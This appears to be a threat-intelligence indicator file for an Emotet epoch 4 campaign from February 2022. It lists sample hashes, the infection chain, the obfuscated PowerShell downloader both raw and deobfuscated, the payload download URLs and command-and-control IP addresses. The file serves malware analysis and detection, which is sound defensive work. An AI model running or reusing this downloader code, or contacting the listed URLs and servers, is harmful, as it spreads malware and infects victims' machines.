-
Notifications
You must be signed in to change notification settings - Fork 10
/
e4_emotet_22.02.2022.txt
105 lines (83 loc) · 5.76 KB
/
e4_emotet_22.02.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
Emotet 2022 - 22.02.2022 - epoch4
************************************************************************************************************
.xls b5c8847b02e96158c039a9ed01fea452df8bfb8ce6fae0fbdb47007e571484d6
.dll c4531347c02ad48f5d1f2471aad72edcbeeda910dd5a0c75e0e9fc4c9d42dc92
Exec >>
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\UJ511288041821248.xls
wscript c:\programdata\bbiwjdf.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$ghkid=('$MJXdfshDrfGZses4=\"http:dhjdhjwearsweetbomb.comdhjwp-contentdhj15zZybP1EXttxDK4JHdhjbouhttps:dhjdhj1566xueshe.comdhjwp-includesdhjz92ZVqHH8dhjbouhttp:dhjdhjmymicrogreen.mightcode.comdhjFox-CdhjNWssAbNOJDxhsdhjbouhttp:dhjdhjo2omart.co.indhjinfructuosedhjm4mgt2MeUdhjbouhttp:dhjdhjmtc.joburg.org.zadhj-dhjGBGJeFxXWlNbABv2dhjbouhttp:dhjdhjwww.ama.cudhjjprdhjVVPdhjbouhttp:dhjdhjactividades.laforetlanguages.comdhjwp-admindhjdU8Dsdhjbouhttps:dhjdhjdwwmaster.comdhjwp-contentdhj1sR2HfFxQnkWuudhjbouhttps:dhjdhjedu-media.cndhjwp-admindhj0JAEdhjbouhttps:dhjdhjiacademygroup.cldhjofficedhjG42LJPLkldhjbouhttps:dhjdhjznzhou.topdhjmodedhj0Qbdhj\" -sPLIt \"bou\"; foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){$GweYH57sedswd=(\"ciuwd:iuwd\priuwdogiuwdramiuwddatiuwda\oiphilfj.diuwdliuwdl\").rePlACe(\"iuwd\",\"\");inVOke-weBrEqUesT -uRI $yIdsRhye34syufgxjcdf -oUtFIle $GweYH57sedswd;iF(teSt-pATh $GweYH57sedswd){if((gEt-itEm $GweYH57sedswd).leNGth -ge 47523){bReak;}}}').replace(\"dhj\",\"/\");iex $ghkid"
C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\regsvr32.exe /s c:\programdata\oiphilfj.dll
c:\windows\syswow64\regsvr32.exe /s c:\programdata\oiphilfj.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ntetq\kmlysgkrktii.hwz"
********************************************
.ps1 blobs:
$ghkid = "$MJXdfshDrfGZses4=\"http://wearsweetbomb.com/wp-content/15zZybP1EXttxDK4JH/bouhttps://1566xueshe.com/wp-includes/z92ZVqHH8/bouhttp://mymicrogreen.mightcode.com/Fox-C/NWssAbNOJDxhs/bouhttp://o2omart.co.in/infructuose/m4mgt2MeU/bouhttp://mtc.joburg.org.za/-/GBGJeFxXWlNbABv2/bouhttp://www.ama.cu/jpr/VVP/bouhttp://actividades.laforetlanguages.com/wp-admin/dU8Ds/bouhttps://dwwmaster.com/wp-content/1sR2HfFxQnkWuu/bouhttps://edu-media.cn/wp-admin/0JAE/bouhttps://iacademygroup.cl/office/G42LJPLkl/bouhttps://znzhou.top/mode/0Qb/\" -sPLIt \"bou\"; foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){$GweYH57sedswd=(\"ciuwd:iuwd\\priuwdogiuwdramiuwddatiuwda\\oiphilfj.diuwdliuwdl\").rePlACe(\"iuwd\",\"\");inVOke-weBrEqUesT -uRI $yIdsRhye34syufgxjcdf -oUtFIle $GweYH57sedswd;iF(teSt-pATh $GweYH57sedswd){if((gEt-itEm $GweYH57sedswd).leNGth -ge 47523){bReak;}}}"
invoke-expression "$MJXdfshDrfGZses4=\"http://wearsweetbomb.com/wp-content/15zZybP1EXttxDK4JH/bouhttps://1566xueshe.com/wp-includes/z92ZVqHH8/bouhttp://mymicrogreen.mightcode.com/Fox-C/NWssAbNOJDxhs/bouhttp://o2omart.co.in/infructuose/m4mgt2MeU/bouhttp://mtc.joburg.org.za/-/GBGJeFxXWlNbABv2/bouhttp://www.ama.cu/jpr/VVP/bouhttp://actividades.laforetlanguages.com/wp-admin/dU8Ds/bouhttps://dwwmaster.com/wp-content/1sR2HfFxQnkWuu/bouhttps://edu-media.cn/wp-admin/0JAE/bouhttps://iacademygroup.cl/office/G42LJPLkl/bouhttps://znzhou.top/mode/0Qb/\" -sPLIt \"bou\"; foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){$GweYH57sedswd=(\"ciuwd:iuwd\\priuwdogiuwdramiuwddatiuwda\\oiphilfj.diuwdliuwdl\").rePlACe(\"iuwd\",\"\");inVOke-weBrEqUesT -uRI $yIdsRhye34syufgxjcdf -oUtFIle $GweYH57sedswd;iF(teSt-pATh $GweYH57sedswd){if((gEt-itEm $GweYH57sedswd).leNGth -ge 47523){bReak;}}}"
----
$mjxdfshdrfgzses4 = "http://wearsweetbomb.com/wp-content/15zZybP1EXttxDK4JH/", "https://1566xueshe.com/wp-includes/z92ZVqHH8/", "http://mymicrogreen.mightcode.com/Fox-C/NWssAbNOJDxhs/", "http://o2omart.co.in/infructuose/m4mgt2MeU/", "http://mtc.joburg.org.za/-/GBGJeFxXWlNbABv2/", "http://www.ama.cu/jpr/VVP/", "http://actividades.laforetlanguages.com/wp-admin/dU8Ds/", "https://dwwmaster.com/wp-content/1sR2HfFxQnkWuu/", "https://edu-media.cn/wp-admin/0JAE/", "https://iacademygroup.cl/office/G42LJPLkl/", "https://znzhou.top/mode/0Qb/"
foreach ($yidsrhye34syufgxjcdf in $mjxdfshdrfgzses4) {
$gweyh57sedswd = "c:\\programdata\\oiphilfj.dll"
invoke-webrequest -uri $yidsrhye34syufgxjcdf -outfile $gweyh57sedswd
if (test-path "c:\\programdata\\oiphilfj.dll") {
if ((get-item "c:\\programdata\\oiphilfj.dll").length -ge 47523) {
break
}
}
}
.dll drops
http://wearsweetbomb.com/wp-content/15zZybP1EXttxDK4JH/
https://1566xueshe.com/wp-includes/z92ZVqHH8/
http://mymicrogreen.mightcode.com/Fox-C/NWssAbNOJDxhs/
http://o2omart.co.in/infructuose/m4mgt2MeU/
http://mtc.joburg.org.za/-/GBGJeFxXWlNbABv2/
http://www.ama.cu/jpr/VVP/
http://actividades.laforetlanguages.com/wp-admin/dU8Ds/
https://dwwmaster.com/wp-content/1sR2HfFxQnkWuu/
https://edu-media.cn/wp-admin/0JAE/
https://iacademygroup.cl/office/G42LJPLkl/
https://znzhou.top/mode/0Qb/
c2's
175.107.196.192:80
156.67.219.84:7080
159.8.59.82:8080
119.235.255.201:8080
31.24.158.56:8080
212.237.17.99:8080
45.118.135.203:7080
45.176.232.124:443
129.232.188.93:443
58.227.42.236:80
162.214.50.39:7080
176.104.106.96:8080
153.126.203.229:8080
162.243.175.63:443
138.185.72.26:8080
50.116.54.215:443
50.30.40.196:8080
178.79.147.66:8080
203.114.109.124:443
82.165.152.127:8080
79.172.212.216:8080
103.134.85.85:80
178.128.83.165:80
216.158.226.206:443
103.75.201.2:443
51.254.140.238:7080
45.142.114.231:8080
107.182.225.142:8080
81.0.236.90:443
46.55.222.11:443
164.68.99.3:8080
185.157.82.211:8080
131.100.24.231:80
212.24.98.99:8080
217.182.143.207:443
212.237.56.116:7080
45.118.115.99:8080
158.69.222.101:443
207.38.84.195:8080
41.76.108.46:8080
173.212.193.249:8080
103.75.201.4:443
195.154.133.20:443
110.232.117.186:8080